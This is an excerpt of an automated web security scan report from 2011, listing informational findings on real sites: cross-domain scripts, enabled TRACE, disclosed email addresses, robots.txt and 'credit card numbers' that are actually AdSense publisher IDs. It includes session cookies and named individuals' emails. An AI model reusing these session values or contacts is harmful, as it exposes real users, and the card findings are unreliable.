User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; __utma=61498413.1690544870.1316282695.1316282695.1316282695.1; __utmb=61498413; __utmc=61498413; __utmz=61498413.1316282695.1.1.utmccn=(referral)|utmcsr=wonderwall.msn.com|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   
   <head>
...[SNIP]...
<link class="component" href="/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__" rel="stylesheet" type="text/css" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ad.afy11.net/srad.js?azId=2000000523507">
</script>
...[SNIP]...
</div>

<script src="//www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="//connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

16.7. http://www.slideshare.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.slideshare.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan
Cookie: SERVERID=w2; __gads=ID=69b17974e93c8eae:T=1316270141:S=ALNI_Mbek8pqhnVVqxmOs-xWGyH5RzmwXQ; __qca=P0-93657133-1316288213840; __utma=187450090.1628076830.1316288212.1316288212.1316288212.1; __utmb=187450090.4.8.1316288214476; __utmc=187450090; __utmz=187450090.1316288214.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=187450090.non-member

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 17 Sep 2011 14:45:03 GMT
Content-Length: 76484
Date: Sat, 17 Sep 2011 14:46:25 GMT
X-Varnish: 715126100
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
.__ .__ .___ .__
_____| | |__| __| _/____ _____| |__ __
...[SNIP]...
</script>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js" type="text/javascript" charset="utf-8"></script>


<script src="http://public.slidesharecdn.com/javascripts/jquery.tipsy.js?27533" type="text/javascript"></script>
<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>
...[SNIP]...
</script>

<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...
<!--quantserve code ends -->


<script src="http://public.slidesharecdn.com/javascripts/fancybox.js?27533" type="text/javascript"></script>
<script src="http://public.slidesharecdn.com/javascripts/global.js?27533" type="text/javascript"></script>

<script src="http://public.slidesharecdn.com/javascripts/jquery.jcarousel.min.js?27533" type="text/javascript"></script>
<script src="http://public.slidesharecdn.com/javascripts/homepage.js?27533" type="text/javascript"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://public.slidesharecdn.com/v3/scripts/proCtaBox.js?27533" type="text/javascript"></script>
<script src="http://public.slidesharecdn.com/v3/scripts/fbconnect.js?27533" type="text/javascript"></script>
...[SNIP]...

16.8. http://www.slideshare.net/MillwardBrown/value-of-a-fan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /MillwardBrown/value-of-a-fan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MillwardBrown/value-of-a-fan HTTP/1.1
Host: www.slideshare.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dynamiclogic.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Status: 200 OK
X-Bench-ID: s7345913/a28855092
X-XSS-Protection: 0
X-Bench-Route: slideshow/view
X-Runtime: 648
cache-control: no-cache, must-revalidate
Content-Length: 95233
Date: Sat, 17 Sep 2011 14:45:35 GMT
X-Varnish: 715112534 714959437
Age: 598
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<!--
_ _ _ _
___| (_)__| |___ ___| |_ __ _ _ _ ___
(_-<| | / _` / -_|_-<| ' \/ _` |
...[SNIP]...
</script><script src="http://public.slidesharecdn.com/v3/scripts/combined.js?27533"></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script src="https://apis.google.com/js/plusone.js" type="text/javascript" async></script>
...[SNIP]...

17. TRACE method is enabled  previous  next
There are 8 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. http://app.streamsend.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /

Request

TRACE / HTTP/1.0
Host: app.streamsend.com
Cookie: 612856e28b82f3ea

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:07 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: app.streamsend.com
Cookie: 612856e28b82f3ea; _session_id=28db46e0d36a1d842c30a4a081223ef9


17.2. http://cspix.media6degrees.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cspix.media6degrees.com
Cookie: 711851bf845bc690

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cspix.media6degrees.com
Cookie: 711851bf845bc690; ipinfo=2lqzzw60zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=41al010r08458kv131p20220324e2od118e10624fj9y118e10q24ofw7127p10v24ql0810pp10u24t3e9118e10a23sti11hj10224mij2127p20
...[SNIP]...

17.3. http://en.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 39a9de95c7ee1bf6

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 12:44:50 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 39a9de95c7ee1bf6
Via: 1.0 sq61.wikimedia.org:3128 (squid/2.7.STABLE9)
X-Forwarded-For: 50.23.123.106, 208.80.152.71


17.4. http://pcdn.tcgmsrv.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcdn.tcgmsrv.net
Path:   /

Request

TRACE / HTTP/1.0
Host: pcdn.tcgmsrv.net
Cookie: 4737ae41f7889e40

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:33:40 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n57 ( origin>CONN)
Content-Length: 347
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: med.sv4.tcgmsrv.net
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n57.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.55
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://pcdn.tcgmsrv.net/
Cookie: 4737ae41f7889e40
Connection: keep-alive


17.5. http://pixel.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: ab03bc16963415bd

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:44:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: ab03bc16963415bd; 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C
X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


17.6. http://s.dlqm.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.dlqm.net
Path:   /

Request

TRACE / HTTP/1.0
Host: s.dlqm.net
Cookie: 8b3194c764376d4a

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:33:52 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: NSC_iuuq-t.emrn.ofu=445836713660;Version=1;Max-Age=1200;path=/

TRACE / HTTP/1.0
Host: s.dlqm.net
Cookie: 8b3194c764376d4a; NSC_iuuq-t.emrn.ofu=445836713660
Connection: Keep-Alive
X-Client-IP: 50.23.123.106


17.7. http://segs.btrll.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /

Request

TRACE / HTTP/1.0
Host: segs.btrll.com
Cookie: 4d056b1628130aea

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:42:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: segs.btrll.com
Cookie: 4d056b1628130aea; id=OPT_OUT
X-EKC-SRM-ARM: 50.23.123.106


17.8. http://survey.questionmarket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: survey.questionmarket.com
Cookie: 6f003f33fb302c3b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:49 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

TRACE / HTTP/1.0
Host: survey.questionmarket.com
Cookie: 6f003f33fb302c3b; NSC_tvswfz-iuuq=4458360f3660; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; linkjumptest=1; endsurvey=no; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D92273
...[SNIP]...

18. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. http://app.streamsend.com/public/6EzE/J1l/subscribe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The following email address was disclosed in the response:

Request

GET /public/6EzE/J1l/subscribe HTTP/1.1
Host: app.streamsend.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dynamiclogic.com/home/insights

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:07 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.14
ETag: "bf61b2035c9771e6bb57f502104cf769"
X-Runtime: 142
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=28db46e0d36a1d842c30a4a081223ef9; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 3193
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><script type="text/javascript">var NREUMQ=[];NREUMQ.push(["mark","firstbyte",new Date().getT
...[SNIP]...
<a href="mailto:marketing@dynamiclogic.com">marketing@dynamiclogic.com</a>
...[SNIP]...

18.2. http://survey.questionmarket.com/surv/913131/newai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/913131/newai.php

Issue detail

The following email address was disclosed in the response:

Request

POST /surv/913131/newai.php HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php?member_id=326080549&site=10&from_aicode=922738
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

action=nextpage&age=99&country=38&localtime=9-17-2011+14%3A35%3A31&flashinstalled=false&screenheight=1200&screenwidth=1920&x=60&y=24

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:08 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:41:08 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 8075
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<A HREF=mailto:responses@dynamiclogic.com>responses@dynamiclogic.com</A>
...[SNIP]...

18.3. http://survey.questionmarket.com/surv/925590/newai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://survey.questionmarket.com
Path:   /surv/925590/newai.php

Issue detail

The following email address was disclosed in the response:

Request

GET /surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt= HTTP/1.1
Host: survey.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/913131/newai.php
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; NSC_tvswfz-iuuq=4458360f3660; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; PHPSESSID=959bcd26e14b9626e1332081ccc6c315; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:24 GMT
Server: Apache
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Pragma: no-cache
Expires: -1
Last-Modified: Sat, 17 Sep 2011 14:41:24 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Vary: Accept-Encoding
Content-Length: 7609
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_tvswfz-iuuq=4458360f3660;Version=1;Max-Age=1200;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<A HREF=mailto:responses@dynamiclogic.com>responses@dynamiclogic.com</A>
...[SNIP]...

18.4. http://www.slideshare.net/MillwardBrown/value-of-a-fan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /MillwardBrown/value-of-a-fan

Issue detail

The following email addresses were disclosed in the response:

Request

GET /MillwardBrown/value-of-a-fan HTTP/1.1
Host: www.slideshare.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dynamiclogic.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Status: 200 OK
X-Bench-ID: s7345913/a28855092
X-XSS-Protection: 0
X-Bench-Route: slideshow/view
X-Runtime: 648
cache-control: no-cache, must-revalidate
Content-Length: 95233
Date: Sat, 17 Sep 2011 14:45:35 GMT
X-Varnish: 715112534 714959437
Age: 598
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<!--
_ _ _ _
___| (_)__| |___ ___| |_ __ _ _ _ ___
(_-<| | / _` / -_|_-<| ' \/ _` |
...[SNIP]...
<li>Further informationFor further information about this study, please contact:... WFA Rob Dreblow r.dreblow@wfanet.org... Millward Brown/ Dynamic Logic Duncan Southgate Duncan.Southgate@millwardbrown.com Juan Manuel Hernandez JuanManuel.Hernandez@millwardbrown.comContact MB or DL to conduct your own bespoke fan page assessment </li>
...[SNIP]...

19. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


19.1. http://www.slideshare.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /

Issue detail

The following credit card number was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.slideshare.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan
Cookie: SERVERID=w2; __gads=ID=69b17974e93c8eae:T=1316270141:S=ALNI_Mbek8pqhnVVqxmOs-xWGyH5RzmwXQ; __qca=P0-93657133-1316288213840; __utma=187450090.1628076830.1316288212.1316288212.1316288212.1; __utmb=187450090.4.8.1316288214476; __utmc=187450090; __utmz=187450090.1316288214.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=187450090.non-member

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 17 Sep 2011 14:45:03 GMT
Content-Length: 76484
Date: Sat, 17 Sep 2011 14:46:25 GMT
X-Varnish: 715126100
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
.__ .__ .___ .__
_____| | |__| __| _/____ _____| |__ __
...[SNIP]...
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-5203428669823392");
GS_googleEnableAllServices();
</script><script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "homepage_bottom");
</script>
...[SNIP]...
<script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "homepage_top_120x60");
</script><script type='text/javascript'>

GA_googleAddSlot("ca-pub-5203428669823392", "homepage_top_sponsoredby");
</script><script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "homepage_right2");
</script><script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "homepage_right1");
</script>
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-5203428669823392", "footer");
</script>
...[SNIP]...
<script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "pixel_tracker");
</script>
...[SNIP]...
<!-- ca-pub-5203428669823392/homepage_top_sponsoredby -->
...[SNIP]...
<!-- ca-pub-5203428669823392/homepage_right1 -->
...[SNIP]...
<!-- ca-pub-5203428669823392/homepage_right2 -->
...[SNIP]...

19.2. http://www.slideshare.net/MillwardBrown/value-of-a-fan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /MillwardBrown/value-of-a-fan

Issue detail

The following credit card number was disclosed in the response:

Request

GET /MillwardBrown/value-of-a-fan HTTP/1.1
Host: www.slideshare.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dynamiclogic.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html; charset=utf-8
Status: 200 OK
X-Bench-ID: s7345913/a28855092
X-XSS-Protection: 0
X-Bench-Route: slideshow/view
X-Runtime: 648
cache-control: no-cache, must-revalidate
Content-Length: 95233
Date: Sat, 17 Sep 2011 14:45:35 GMT
X-Varnish: 715112534 714959437
Age: 598
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<!--
_ _ _ _
___| (_)__| |___ ___| |_ __ _ _ _ ___
(_-<| | / _` / -_|_-<| ' \/ _` |
...[SNIP]...
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-5203428669823392");
GS_googleEnableAllServices();
</script>
...[SNIP]...
<script type='text/javascript'>
GS_googleAddAdSenseService("ca-pub-5203428669823392");
GS_googleEnableAllServices();
</script>
...[SNIP]...
<script type='text/javascript'>
GA_googleAddSlot("ca-pub-5203428669823392", "House_top_sv_300x250");
</script>
...[SNIP]...
<!-- ca-pub-5203428669823392/House_top_sv_300x250 -->
...[SNIP]...

20. Robots.txt file  previous  next
There are 13 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


20.1. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310681018000"
Last-Modified: Thu, 14 Jul 2011 22:03:38 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 13:33:30 GMT
Connection: close

User-agent: *
Disallow: /

20.2. http://app.streamsend.com/public/6EzE/J1l/subscribe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.streamsend.com
Path:   /public/6EzE/J1l/subscribe

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: app.streamsend.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:47:07 GMT
Server: Apache/2.2.17 (Unix) Phusion_Passenger/2.2.14 mod_ssl/2.2.17 OpenSSL/0.9.8b PHP/5.2.2 mod_fastcgi/2.4.2
Last-Modified: Mon, 06 Dec 2010 00:55:21 GMT
ETag: "7f-496b357ab5040"
Accept-Ranges: bytes
Content-Length: 127
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /

20.3. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
